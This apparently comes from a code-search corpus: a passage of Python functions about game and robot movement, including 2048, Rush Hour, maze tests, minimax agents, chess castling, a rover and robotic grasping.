possible:\n\t\t\ttic=time.clock()\n\t\t\tpossible=True\n\t\t\tobstList=self.G.terrain.GetVisibleObstacles(moveTo, R=self.radius)\n\t\t\ttreeList=self.G.terrain.GetTrees(moveTo, R=self.radius+self.m.plantMinDist)\n\t\t\tobstList+=[tr for tr in treeList if not tr in obstList] #this procedure minimizes R in Getobst\n\t\t\t#[p1, p2]=self.getPHCoord(moveTo)\n\t\t\tphPos=self.getPHCoord(moveTo)\n\t\t\tplantSpots=self.getPlantingCoord(moveTo)\n\t\t\t#[f1,f2]=self.getPlantingCoord(moveTo)\n\t\t\tif self.otherDevice is not None:\n\t\t\t\totherDevPlantCor=self.otherDevice.getPlantingCoord(self.otherDevice.pos)\n\t\t\t\t#check for colissions and similar related to other device\n\t\t\t\tif collide(self, self.otherDevice, o1pos=moveTo): \n\t\t\t\t\tpossible=False\n\t\t\t\telse:\n\t\t\t\t\tfor o in otherDevPlantCor:\n\t\t\t\t\t\tfor f in plantSpots:\n\t\t\t\t\t\t\t#if getDistanceSq(f1, o)<d2 or getDistanceSq(f2, o)<d2:\n\t\t\t\t\t\t\tif getDistanceSq(f,o)<d2:#plantingspot of device is closer than allowed to other Device's plantingspot\n\t\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t\tbreak\t\t\n\t\t\tif possible:\t#either 1a or angle OK and above check OK\n\t\t\t\tfor obst in obstList:\n\t\t\t\t\t#tic=time.clock()\n\t\t\t\t\tif isinstance(obst, Tree):\n\t\t\t\t\t\t#other demands, 
more than 1.5 m from plantingspot.\n\t\t\t \t\t\tfor f in plantSpots:\n\t\t\t\t\t\t\t#if getDistanceSq(f1, o)<d2 or getDistanceSq(f2, o)<d2:\n\t\t\t\t\t\t\tif getDistanceSq(f, obst.pos)<d2 or collide(self, obst, o1pos=moveTo):\n\t\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\telif isinstance(obst, Hole): #hole can be in beetween plantheads... Plantpos can be in hole.\n\t\t\t\t\t\tif len(self.plantHeads)==1: #bracke\n\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telif collide(self.plantHeads[0], obst, o1pos=phPos[0]) or collide(self.plantHeads[1], obst, o1pos=phPos[1]):\n\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t#PlantingDevice.timesProf[0]+=time.clock()-tic\t\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telif collide(self, obst, o1pos=moveTo):\n\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t#PlantingDevice.timesProf[0]+=time.clock()-tic\t\n\t\t\t\t\t\tbreak\n\t\t\t\tif possible and self.otherDevice is not None and exceeds(self, moveTo, self.otherDevice):\n\t\t\t\t\tpossible=False\t#angle is too big to the other device\n\t\t\t#at this point, all test for \"possibility\" are performed.\n\t\t\tPlantingDevice.timesProf[0]+=time.clock()-tic\n\t\t\tdthini=pi/50.\n\t\t\tif not possible:\n\t\t\t\t#move in a spiral outwards\n\t\t\t\trTemp=a+b*thTemp\n\t\t\t\tdth=(pi/25.)/(rTemp/2.)\n\t\t\t\tthTemp+=dth\n\t\t\t\tthInit=thTemp #used to avoid infinite loop\n\t\t\t\tmoveTo=cart([rTemp,thTemp],opt)\n\t\t\t\twhile not inside(moveTo) or (self.otherDevice is not None and exceeds(self, moveTo, self.otherDevice)):\n\t\t\t\t\t#outside borders or too big angle.. make above expression shorter..\n\t\t\t\t\t#self.pSpots.append(self.m.getCartesian([rTemp,thTemp], opt))\n\t\t\t\t\trTemp=a+b*thTemp\n\t\t\t\t\tthTemp+=(pi/25.)/(rTemp/2.)\t\t\t\t\t\n\t\t\t\t\t#if abs(thTemp-thInit)>2*pi: #if radius is too big..\n\t\t\t\t\tif abs(thInit-thTemp)>2*pi:\n\t\t\t\t\t\tplant=False #we will not plant this time.\n\t\t\t\t\t\t#move to make it easier for the other head:\n\t\t\t\t\t\tif self.otherDevice is not None and self.lastPos==self.pos and self.struckLastTime:\t\t\t\t\t\t\n\t\t\t\t\t\t\tthIni=self.posCyl[1]-dthini\n\t\t\t\t\t\t\tthTemp=thIni\n\t\t\t\t\t\t\t\"\"\"if exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\tnp=cart([self.posCyl[0],thTemp])\"\"\" #old stuff... should be removed, right?\n\t\t\t\t\t\t\twhile inside(cart([self.posCyl[0],thTemp])) and not exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\tthTemp-=dthini #moves in order to make more space\n\t\t\t\t\t\t\tif thTemp==thIni: #it wasnt inside or exceeded\n\t\t\t\t\t\t\t\tcommands.extend(self.releaseDriver()) #releases driver, if he is used\n\t\t\t\t\t\t\t\tif exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\t\t#we are struck! 
Wait for other device to move.\n\t\t\t\t\t\t\t\t\tself.m.stopControl() #we could have reached the end here.\n\t\t\t\t\t\t\t\t\tcommands.append((waitevent, self, self.otherDevice.moveEvent))\n\t\t\t\t\t\t\t\telse: #not inside, we have reached the end of the half circle\n\t\t\t\t\t\t\t\t\tself.debugPrint(\"end of pattern reached, passivates %s device\"%self.mountPoint)\n\t\t\t\t\t\t\t\t\tself.noMoreSpots=True\n\t\t\t\t\t\t\t\t\tself.m.stopControl() #we could have reached the end here.\n\t\t\t\t\t\t\t\t\tcommands.append((passivate, self))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmoveTo=cart([self.posCyl[0],thTemp+dthini])\n\t\t\t\t\t\t\t\ttraveltime=self.setPos(moveTo)\n\t\t\t\t\t\t\t\tself.debugPrint('clears for other head')\n\t\t\t\t\t\t\t\tcommands=self.cmnd(commands, traveltime,auto=auto['clearForOtherHead'])\n\t\t\t\t\t\tif plant:\n\t\t\t\t\t\t\tcommands=self.cmnd(commands, t['searchTime'],auto=auto['micrositeSelection'])\n\t\t\t\t\t\t\tself.m.timeConsumption['searchTime']+=t['searchTime']\n\t\t\t\t\t\treturn (commands,plant)\n\t\t\t\t\tmoveTo=cart([rTemp,thTemp],opt)\n\t\ttravelTime=self.setPos(moveTo)\n\t\tself.debugPrint('traveltime: %f'%travelTime)\n\t\tif plant: #this timeconsumption is only for succesfull...\n\t\t\tcommands=self.cmnd(commands, t['searchTime'],auto=auto['micrositeSelection'])\n\t\t\tself.m.timeConsumption['searchTime']+=t['searchTime']\t\t\n\t\tcommands=self.cmnd(commands, travelTime,auto=auto['moveToMicro'])\n\t\treturn (commands,plant)", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n 
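# The same occupancy test guards every direction of this car move: the cell just
# past the car must not hold another vehicle (an uppercase name or the red car 'r').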
elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def motion(self):\n priority = {\"north\": [-1, 0], \"south\": [1, 0],\n \"east\": [0, 1], \"west\": [0, -1]}\n\n priority_list = [\"north\", \"south\", \"east\", \"west\"]\n\n critical_point = False\n while critical_point is False:\n row = self.curr_cell.row\n column = self.curr_cell.col\n\n if self.allow_to_move(priority_list[0],\n row + priority[priority_list[0]][0],\n column + priority[priority_list[0]][1]):\n\n self.move(priority_list[0])\n\n elif self.allow_to_move(priority_list[1],\n row + priority[priority_list[1]][0],\n column + priority[priority_list[1]][1]):\n\n self.move(priority_list[1])\n\n elif self.allow_to_move(priority_list[2],\n row + priority[priority_list[2]][0],\n column + priority[priority_list[2]][1]):\n\n self.move(priority_list[2])\n\n elif self.allow_to_move(priority_list[3],\n row + priority[priority_list[3]][0],\n column + priority[priority_list[3]][1]):\n\n self.move(priority_list[3])\n\n else:\n # Robot isolated\n critical_point = True\n\n return self.curr_cell, self.path", "def make_move(move):\n global manatee_pos\n global hyacinths\n global hyacinth_pos\n\n # Ends the program if movement is out of bounds\n if move == (0, 0):\n return None\n new_pos = (manatee_pos[0] + move[0], manatee_pos[1] + move[1])\n if new_pos[0] < 0 or new_pos[0] >= len(map):\n return None\n if new_pos[1] < 0 or new_pos[1] >= len(map[new_pos[0]]):\n return None\n\n entity = map[new_pos[0]][new_pos[1]]\n if entity == \"#\" or entity == \"G\":\n # Runs if movement is impossible\n return None\n if entity == \" \" or entity == \".\":\n # Runs if normal movement is possible\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return None\n if entity == \"O\":\n # Runs if manatee wins game\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return \"win\"\n if entity == \"\\\\\":\n # Runs if manatee eats hyacinth\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n hyacinths += 1\n if len(hyacinth_pos) == hyacinths:\n map[grate_pos[0]][grate_pos[1]] = \"O\"\n return None\n if entity == \"*\":\n # Checks if manatee can push boat\n if move[0] == 0:\n 
new_boat_pos = (new_pos[0] + move[0], new_pos[1] + move[1])\n if new_boat_pos[0] < 0 or new_boat_pos[0] >= len(map):\n return None\n if new_boat_pos[1] < 0 \\\n or new_boat_pos[1] >= len(map[new_boat_pos[0]]):\n return None\n if map[new_boat_pos[0]][new_boat_pos[1]] == \" \":\n map[new_boat_pos[0]][new_boat_pos[1]] = \"*\"\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return None\n return None", "def calculate_next_move(self, visit):\n self.depth += 1\n new_boards = []\n for vehicle_id in range(len(self.vehicles)):\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x += 1\n\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x -= 1\n\n else: #vertical\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y += 1\n\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y -= 1\n self.depth -= 1\n return new_boards", "def move_to_position2(self):", "def move(self, direction):\r\n # replace with your code\r\n initial_tile = self.__direct_top[direction]\r\n offset = OFFSETS[direction]\r\n direct_range = self.__direct_range[direction] \r\n backup_list = [[0 for dummy_col in range(self.grid_width)] for dummy_row in range(self.grid_height)]\r\n \r\n for initial_count, tile_cursor in enumerate(initial_tile):\r\n tem_list = []\r\n grid_cursor = tile_cursor\r\n for dummy_cursor in range(direct_range):\r\n \r\n tem_list.append(self.grid[grid_cursor[0]][grid_cursor[1]])\r\n grid_cursor = tuple(x + y for x,y in zip(grid_cursor,offset))\r\n \r\n new_list = merge(tem_list)\r\n if self.update_dict[direction] == 0:\r\n for col_cursor in range(direct_range):\r\n backup_list[col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] == 1: \r\n for col_cursor in range(direct_range):\r\n backup_list[self.grid_height -1 - col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] ==3:\r\n backup_list[initial_count] = new_list\r\n else:\r\n for col_cursor in range(direct_range):\r\n backup_list[initial_count][self.grid_width -1 - col_cursor] = new_list[col_cursor]\r\n \r\n flag = (self.grid == backup_list)\r\n 
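# flag is True when the merged grid matches the old one, i.e. the move changed
# nothing; a new tile is only spawned after a move that actually shifted tiles.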
self.grid = backup_list\r\n if not flag:\r\n self.new_tile()", "def action(self):\r\n\r\n\r\n #have we just started?\r\n if self.player_information[\"us\"][\"nTokens\"] == 0:\r\n move = generate_starting_move(self.player_information[\"us\"][\"player_side\"], self.board_array)\r\n return move\r\n\r\n #otherwise do minimax \r\n \r\n #set the search depth from how crowded the board is\r\n if self.total_tokens_on_board < 6:\r\n depth = 3\r\n elif self.total_tokens_on_board < 10:\r\n depth = 2\r\n else:\r\n depth = 1\r\n \r\n #have a time reference\r\n print(f'nthrows: {self.player_information[\"us\"][\"nThrowsRemaining\"]}')\r\n starting_time = int(round(time.time(), 0))\r\n #salvage result from minimax\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, depth, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, True, self.turn_no)\r\n\r\n #clean it up a bit \r\n print(self.board_dict)\r\n #tidy it up\r\n result = result[0]\r\n print(f'pre: {result}')\r\n #in case we get a bad move, redo but make it very shallow\r\n if len(result) == 1 or result == (-5, -5):\r\n #force it to return a usable move\r\n counter = 0\r\n while (len(result) == 1) or (result == (-5, -5)):\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, 1, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, False, self.turn_no)\r\n result = result[0]\r\n counter += 1\r\n \r\n #if it's taking too long\r\n if counter > 2: \r\n #generate one random possible move to use \r\n allied_tokens = [token for token in self.player_tokens if self.player_tokens[token] == \"us\"]\r\n move_list = generate_moves(self.board_dict, self.player_tokens, self.co_existance_dict, allied_tokens,\r\n self.player_information, self.board_array, True, \"all\")\r\n \r\n \r\n #if there are no moves\r\n if len(move_list) == 0:\r\n if self.player_information['us']['nThrowsRemaining'] > 0:\r\n throws = generate_possible_throws(self.board_dict, self.player_tokens, self.co_existance_dict, self.player_information, \"us\",\r\n self.player_information[\"us\"][\"player_side\"], self.board_array, \"all\" )\r\n result = random.choice(throws)\r\n \r\n else:\r\n result = random.choice(move_list)\r\n print(f'random: {result}')\r\n break\r\n\r\n print(f' inside: {result}')\r\n\r\n print(result)\r\n #otherwise clean it up\r\n if result[0] == 'throw':\r\n final_result = (result[0].upper(), result[1], result[2])\r\n else:\r\n final_result = (result[0].upper(), result[2], result[3])\r\n # return final result \r\n return final_result", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #check whether a king or a rook initiated the move\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #check whether one of the rooks has been captured\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = 
True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def move(self, direction, cycles):\n\t\tself.planet.tiles[self.y][self.x].set_occupant() # set occupant to the initial tile\n\t\tif direction == \"N\": # unit vector (0, -1)\n\t\t\ty_symbol = -1\n\t\t\tx_symbol = 0\n\t\tif direction == \"S\": # unit vector (0, 1)\n\t\t\ty_symbol = 1\n\t\t\tx_symbol = 0\n\t\tif direction == \"W\": # unit vector (-1, 0)\n\t\t\tx_symbol = -1\n\t\t\ty_symbol = 0\n\t\tif direction == \"E\": # unit vector (1, 0)\n\t\t\tx_symbol = 1\n\t\t\ty_symbol = 0\n\t\ti = 0\n\t\twhile i < int(cycles):\n\t\t\tnext_x = self.x + x_symbol # change x coordinate\n\t\t\tnext_y = self.y + y_symbol # change y coordinate\n\t\t\tnext_x, next_y = self.spherical(next_x, next_y) # get the next tile's coordinate\n\t\t\tif self.can_move(next_x, next_y): # check whether rover can move\n\t\t\t\t#reduce battery\n\t\t\t\tif self.planet.tiles[next_y][next_x].is_shaded():\n\t\t\t\t\tself.battery -= 1\n\t\t\t\tself.x = next_x\n\t\t\t\tself.y = next_y\n\t\t\t\ttile = self.planet.tiles[next_y][next_x]\n\t\t\t\ttile.set_occupant()\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tbreak", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.alphabeta(self, sample_space, affinity, depth_limit, -10000, 10001, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def make_move(self, row, column):\n\t\tif self.board[int(row)][int(column)] == '-':\n\t\t\tself.board[int(row)][int(column)] = self.marker\n\t\telse:\n\t\t\tprint(\"That spot is occupied, you messed up, you lose your turn for doing bad things\")", "def test_execute_instructions_raise_invalid_coordinate_exception(self):\n with self.assertRaises(InvalidCoordinateError):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions('RMMM')", "def computer_move(board,move,player):\r\n com_execution(board, move, player)", "def move_repeatedly():\n check = check50.run(run_command)\n check.stdin(\"WEST\").stdout(room_2_description)\n check.stdin(\"EAST\").stdout(room_1_name)\n check.stdin(\"WEST\").stdout(room_2_name)", "def do_unsafe(self):\r\n if(not self.isLegal()):\r\n raise IllegalMoveException(self.whyNotLegal())\r\n 
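# Legality was verified above, so the transfer below cannot corrupt the board:
# lift the pawn from the start cell and set it down on the destination cell.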
pawn = self.startCell.takePawn()\r\n self.endCell.placePawn(pawn)", "def process_move(self, retrieval, destination):\n self.board.attempt_move([retrieval[0], retrieval[1], destination[0]])", "def test_maze_move_4(self):\n maze_template = [['#', '#', '#', '#', '#', '#', '#'], \n ['#', '.', '.', '.', '.', '.', '#'], \n ['#', '.', '#', '#', '#', '.', '#'], \n ['#', '.', '.', '@', '#', '.', '#'], \n ['#', '@', '#', '.', '@', '.', '#'], \n ['#', '#', '#', '#', '#', '#', '#']]\n rat_J = a2.Rat(a2.RAT_1_CHAR, 1, 1)\n rat_P = a2.Rat(a2.RAT_2_CHAR, 1, 4)\n\n maze = a2.Maze(maze_template, rat_J, rat_P)\n old_sprout_count = maze.num_sprouts_left\n\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n\n self.assertEqual(maze.num_sprouts_left, old_sprout_count - 1)", "def execute_grasp(self, grasp_data=None, close_gripper=True, use_cartesian_plan=True, stop_at_pre_grasp=False, push_in_distance=None, use_debug_speed=False, force_threshold_magnitude=None, ee_speed_m_s=0.05):\n\n if grasp_data is None:\n grasp_data = self.state.grasp_data\n\n if push_in_distance is None:\n push_in_distance = self.graspingParams['grasp_push_in_distance']\n\n gripper_width = grasp_data.grasp_inner_diameter\n if gripper_width is not None:\n gripper_driver_width = gripper_width + self.graspingParams['gripper_width_offset']\n self.gripperDriver.sendGripperCommand(gripper_driver_width, force=20.0)\n else:\n self.gripperDriver.send_open_gripper_set_distance_from_current()\n\n rospy.sleep(0.5) # wait for 0.5 for gripper to move\n\n\n\n # compute the pre-grasp frame\n pre_grasp_distance = self.graspingParams['pre_grasp_distance']\n pre_grasp_frame_gripper = grasp_data.compute_pre_grasp_frame(distance=pre_grasp_distance)\n\n pre_grasp_ee_pose_stamped = self.makePoseStampedFromGraspFrame(pre_grasp_frame_gripper)\n\n # safety check\n is_safe = (GraspData.grasp_frame_safety_check(grasp_data.grasp_frame) and GraspData.grasp_frame_safety_check(pre_grasp_frame_gripper))\n if not is_safe:\n self.state.set_status(\"SAFETY_CHECK_FAILED\")\n return False\n\n\n # run the ik for moving to pre-grasp location\n graspLocationData = self.graspingParams[self.state.graspingLocation]\n above_table_pre_grasp = graspLocationData['poses']['above_table_pre_grasp']\n pre_grasp_ik_response = self.robotService.runIK(pre_grasp_ee_pose_stamped,\n seedPose=above_table_pre_grasp,\n nominalPose=above_table_pre_grasp)\n\n pre_grasp_pose = pre_grasp_ik_response.joint_state.position\n\n if not pre_grasp_ik_response.success:\n rospy.loginfo(\"pre grasp pose ik failed, returning\")\n self.state.set_status_ik_failed()\n self.state.print_status()\n return False\n\n # run the ik for moving to grasp location\n # for now just do IK, otherwise use cartesian space plan with force guards\n grasp_frame_ee_pose_stamped = self.makePoseStampedFromGraspFrame(grasp_data.grasp_frame)\n grasp_ik_response = self.robotService.runIK(grasp_frame_ee_pose_stamped,\n seedPose=above_table_pre_grasp,\n nominalPose=above_table_pre_grasp)\n\n grasp_pose = grasp_ik_response.joint_state.position\n if not grasp_ik_response.success:\n rospy.loginfo(\"pre grasp pose ik failed, returning\")\n self.state.set_status_ik_failed()\n self.state.print_status()\n return False\n\n # store for later use\n self.state.cache['grasp_ik_response'] = grasp_ik_response\n self.state.cache['pre_grasp_ik_response'] = pre_grasp_ik_response\n\n # move to pre-grasp position\n # we do this using a position trajectory\n print \"moving to pre-grasp\"\n 
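# The approach runs in two stages: a joint-space move to the pre-grasp pose here,
# then (further down) either a force-guarded Cartesian descent or a plain IK move.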
pre_grasp_speed = self.graspingParams['speed']['pre_grasp']\n\n #### debugging\n speed = pre_grasp_speed\n if use_debug_speed:\n speed = DEBUG_SPEED\n self.robotService.moveToJointPosition(pre_grasp_pose,\n maxJointDegreesPerSecond=\n speed)\n\n self.state.set_status(\"PRE_GRASP\")\n print \"at pre-grasp pose\"\n\n if stop_at_pre_grasp:\n return\n\n if use_cartesian_plan:\n # move to grasp position using compliant cartesian plan\n\n move_forward_distance = pre_grasp_distance + push_in_distance\n print \"move_forward_distance\", move_forward_distance\n xyz_goal = move_forward_distance * np.array([1, 0, 0])\n ee_frame_id = \"iiwa_link_ee\"\n expressed_in_frame = ee_frame_id\n cartesian_grasp_speed = self.graspingParams['speed']['cartesian_grasp']\n cartesian_grasp_speed = ee_speed_m_s\n cartesian_traj_goal = \\\n control_utils.make_cartesian_trajectory_goal(xyz_goal,\n ee_frame_id,\n expressed_in_frame,\n speed=cartesian_grasp_speed)\n\n # add force guards\n # -z (gripper) direction in frame iiwa_link_ee,\n if force_threshold_magnitude is None:\n force_threshold_magnitude = self.graspingParams['force_threshold_magnitude']\n force_vector = force_threshold_magnitude * np.array([-1, 0, 0])\n force_guard = control_utils.make_force_guard_msg(force_vector)\n\n cartesian_traj_goal.force_guard.append(force_guard)\n action_client = self.robotService.cartesian_trajectory_action_client\n action_client.send_goal(cartesian_traj_goal)\n\n # wait for result\n action_client.wait_for_result()\n result = action_client.get_result()\n grasp_data.data['cartesian_trajectory_result'] = result\n\n print \"Cartesian Trajectory Result\\n\", result\n else:\n # move to grasp pose using standard IK\n speed = self.graspingParams['speed']['grasp']\n if use_debug_speed:\n speed = DEBUG_SPEED\n self.robotService.moveToJointPosition(grasp_pose,\n maxJointDegreesPerSecond=\n speed)\n\n\n # record current location of gripper (in world frame)\n # before closing the gripper\n\n pos, quat = self.get_transform(\"iiwa_link_ee\", \"base\")\n T_world_ee = transformUtils.transformFromPose(pos, quat)\n T_world_grasp = transformUtils.concatenateTransforms([self.graspToIiwaLinkEE, T_world_ee])\n self.state.cache['gripper_frame_at_grasp'] = T_world_grasp\n\n has_object = False\n if close_gripper:\n print \"closing gripper\"\n has_object = self.gripperDriver.closeGripper()\n\n if has_object:\n self.state.set_status(\"OBJECT_IN_GRIPPER\")\n print \"object in gripper\"\n else:\n self.state.set_status(\"GRASP_FAILED\")\n print \"grasp failed\"\n\n\n\n return has_object", "def getMove(self, grid):\n# global prune\n# prune = 0\n def Terminal(stateTup):\n \"\"\"\n Checks if the node is a terminal node\n Returns eval(state) if it is terminal\n \"\"\"\n state = stateTup[0]\n maxDepth = self.depthLimit\n if stateTup[1] == maxDepth:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n elif len(stateTup[0].getAvailableMoves()) == 0:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n\n def Eval(state):\n \"\"\"\n This is the eval function which combines many heuristics and assigns\n weights to each of them\n Returns a single value\n \"\"\"\n\n# H1 = htest2(state)\n# return H1\n H2 = h1(state)*monotonic(state)\n return H2\n\n\n def h1(state):\n Max = state.getMaxTile()\n left = len(state.getAvailableCells())/16\n if state.getCellValue([0,0]) == Max:\n v = 1\n else:\n v= 0.3\n Max 
